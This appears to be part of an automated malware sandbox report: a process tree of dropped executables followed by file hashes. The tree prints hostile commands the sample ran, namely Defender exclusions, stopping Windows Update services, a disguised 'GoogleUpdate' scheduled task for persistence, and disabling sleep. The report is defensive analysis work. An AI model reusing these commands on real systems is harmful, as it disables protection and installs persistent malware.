                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
                                                                                6⤵
                                                                                  PID:548
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x78,0x80,0x84,0x70,0x88,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                                    7⤵
                                                                                      PID:3668
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,13780695972128109325,13098403043390426941,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
                                                                                      7⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:7056
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
                                                                                    6⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3780
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                                      7⤵
                                                                                        PID:3584
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
                                                                                      6⤵
                                                                                        PID:6072
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                                          7⤵
                                                                                            PID:6360
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                                                                                          6⤵
                                                                                            PID:6844
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb029b46f8,0x7ffb029b4708,0x7ffb029b4718
                                                                                              7⤵
                                                                                                PID:7096
                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wP3939.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wP3939.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:6376
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                              6⤵
                                                                                                PID:7864
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 7864 -s 540
                                                                                                  7⤵
                                                                                                  • Program crash
                                                                                                  PID:3352
                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:6000
                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ki226gq.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ki226gq.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4332
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                            4⤵
                                                                                              PID:5800
                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9BC6lJ8.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9BC6lJ8.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:7040
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                            3⤵
                                                                                              PID:5400
                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                          1⤵
                                                                                            PID:6084
                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                            1⤵
                                                                                              PID:6548
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 7864 -ip 7864
                                                                                              1⤵
                                                                                                PID:6504
                                                                                              • C:\Users\Admin\AppData\Local\Temp\8D57.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\8D57.exe
                                                                                                1⤵
                                                                                                  PID:6108
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6108 -s 784
                                                                                                    2⤵
                                                                                                    • Program crash
                                                                                                    PID:8020
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6108 -ip 6108
                                                                                                  1⤵
                                                                                                    PID:7952
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B65C.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\B65C.exe
                                                                                                    1⤵
                                                                                                      PID:7468
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
                                                                                                        2⤵
                                                                                                          PID:6564
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Broom.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\Broom.exe
                                                                                                            3⤵
                                                                                                              PID:940
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
                                                                                                            2⤵
                                                                                                              PID:1976
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
                                                                                                                3⤵
                                                                                                                  PID:6792
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
                                                                                                                2⤵
                                                                                                                  PID:7400
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\random.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\random.exe"
                                                                                                                  2⤵
                                                                                                                    PID:4412
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                      3⤵
                                                                                                                        PID:1664
                                                                                                                        • C:\Users\Admin\Pictures\cxIVW6sBLWopDUFEWKakU8bZ.exe
                                                                                                                          "C:\Users\Admin\Pictures\cxIVW6sBLWopDUFEWKakU8bZ.exe"
                                                                                                                          4⤵
                                                                                                                            PID:2260
                                                                                                                          • C:\Users\Admin\Pictures\V40jQvS5tkqKmLNfjEOIvQTj.exe
                                                                                                                            "C:\Users\Admin\Pictures\V40jQvS5tkqKmLNfjEOIvQTj.exe"
                                                                                                                            4⤵
                                                                                                                              PID:6444
                                                                                                                            • C:\Users\Admin\Pictures\0nrUbqGB5UI67sImKdTOw8On.exe
                                                                                                                              "C:\Users\Admin\Pictures\0nrUbqGB5UI67sImKdTOw8On.exe"
                                                                                                                              4⤵
                                                                                                                                PID:2644
                                                                                                                              • C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe
                                                                                                                                "C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe" --silent --allusers=0
                                                                                                                                4⤵
                                                                                                                                  PID:5444
                                                                                                                                  • C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe
                                                                                                                                    C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.54 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2f0,0x300,0x6b9a5648,0x6b9a5658,0x6b9a5664
                                                                                                                                    5⤵
                                                                                                                                      PID:3932
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\1YECoN8Ax88dRRFge6MSgAqM.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\1YECoN8Ax88dRRFge6MSgAqM.exe" --version
                                                                                                                                      5⤵
                                                                                                                                        PID:6192
                                                                                                                                      • C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe
                                                                                                                                        "C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5444 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231112172157" --session-guid=65499a0c-a2f8-44a2-92cb-61171e94e726 --server-tracking-blob=NzY4ZDhjODhlY2M1N2NiYzdhZGE1N2ZmZjk4ZDM3Njc5ZmUwYzAyMTZmYjZlODA0NGRhNzkwOTdjZDQ1NmFiNDp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5OTgwOTcxMC4yNDM2IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI1ZmM2NDQxZC02NDgzLTRiOGEtYmRkYi1mYjY3MDk1YjBiOTAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6C05000000000000
                                                                                                                                        5⤵
                                                                                                                                          PID:5152
                                                                                                                                          • C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe
                                                                                                                                            C:\Users\Admin\Pictures\1YECoN8Ax88dRRFge6MSgAqM.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.54 --initial-client-data=0x2f0,0x300,0x304,0x2cc,0x308,0x6aac5648,0x6aac5658,0x6aac5664
                                                                                                                                            6⤵
                                                                                                                                              PID:7224
                                                                                                                                        • C:\Users\Admin\Pictures\dnp0wisNVybECaK8jTRTCSJN.exe
                                                                                                                                          "C:\Users\Admin\Pictures\dnp0wisNVybECaK8jTRTCSJN.exe"
                                                                                                                                          4⤵
                                                                                                                                            PID:2500
                                                                                                                                          • C:\Users\Admin\Pictures\tBM6LaOw5fn6FmUmOb2yLCFs.exe
                                                                                                                                            "C:\Users\Admin\Pictures\tBM6LaOw5fn6FmUmOb2yLCFs.exe"
                                                                                                                                            4⤵
                                                                                                                                              PID:2548
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Broom.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\Broom.exe
                                                                                                                                                5⤵
                                                                                                                                                  PID:5024
                                                                                                                                              • C:\Users\Admin\Pictures\DrDamgjlI0LdRS9gdEzzDZpJ.exe
                                                                                                                                                "C:\Users\Admin\Pictures\DrDamgjlI0LdRS9gdEzzDZpJ.exe"
                                                                                                                                                4⤵
                                                                                                                                                  PID:8144
                                                                                                                                                • C:\Users\Admin\Pictures\vlL6xg8p5EpDtG0RUhWQSUrE.exe
                                                                                                                                                  "C:\Users\Admin\Pictures\vlL6xg8p5EpDtG0RUhWQSUrE.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5644
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5748
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\random.exe" -Force
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5872
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\latestX.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3132
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BD04.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BD04.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3232
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BD04.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\BD04.exe
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1860
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\CEC8.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\CEC8.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6996
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5096
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4756
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3CE4.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3CE4.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:856
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3624
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop UsoSvc
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:664
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:2276
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop wuauserv
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:1788
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop bits
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:7712
                                                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                                                    sc stop dosvc
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Launches sc.exe
                                                                                                                                                                    PID:2592
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5852
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6572
                                                                                                                                                                      • C:\Windows\System32\powercfg.exe
                                                                                                                                                                        powercfg /x -hibernate-timeout-ac 0
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3476

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        df4fb359f7b2fa8af30bf98045c57c44

                                                                                                                                                                        SHA1

                                                                                                                                                                        6d507359e1fd5be8f7c01fd4b291f81cf9561378

                                                                                                                                                                        SHA256

                                                                                                                                                                        5ff7efcd90db74ff5a6fa467ba741889306ce510b95db8ebd3d5d292dfe587cc

                                                                                                                                                                        SHA512

                                                                                                                                                                        92195f5fe36acb84ce5aeedf8654c2ec1d71ebde1e04a5dbce11df2831c3e085c0cd7132ed2c4bddcc3fd1e546c06021dbe5b7364e86054e6cbd6806e7be0463

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        df4fb359f7b2fa8af30bf98045c57c44

                                                                                                                                                                        SHA1

                                                                                                                                                                        6d507359e1fd5be8f7c01fd4b291f81cf9561378

                                                                                                                                                                        SHA256

                                                                                                                                                                        5ff7efcd90db74ff5a6fa467ba741889306ce510b95db8ebd3d5d292dfe587cc

                                                                                                                                                                        SHA512

                                                                                                                                                                        92195f5fe36acb84ce5aeedf8654c2ec1d71ebde1e04a5dbce11df2831c3e085c0cd7132ed2c4bddcc3fd1e546c06021dbe5b7364e86054e6cbd6806e7be0463

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        df4fb359f7b2fa8af30bf98045c57c44

                                                                                                                                                                        SHA1

                                                                                                                                                                        6d507359e1fd5be8f7c01fd4b291f81cf9561378

                                                                                                                                                                        SHA256

                                                                                                                                                                        5ff7efcd90db74ff5a6fa467ba741889306ce510b95db8ebd3d5d292dfe587cc

                                                                                                                                                                        SHA512

                                                                                                                                                                        92195f5fe36acb84ce5aeedf8654c2ec1d71ebde1e04a5dbce11df2831c3e085c0cd7132ed2c4bddcc3fd1e546c06021dbe5b7364e86054e6cbd6806e7be0463

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        84df16093540d8d88a327b849dd35f8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        c6207d32a8e44863142213697984de5e238ce644

                                                                                                                                                                        SHA256

                                                                                                                                                                        220f89151a0f978b8bbe338b937af90417ae8c17b72a53f2acea7be2ac171a8c

                                                                                                                                                                        SHA512

                                                                                                                                                                        3077ccda8f86f47c41978d6cbb1dcad344e36f236251c8fd8c58d1c48a59106aecfdbe306357b7ebcfe3300bec8ea10ee0e59434c799e8c40e40e6c3c1bd4098

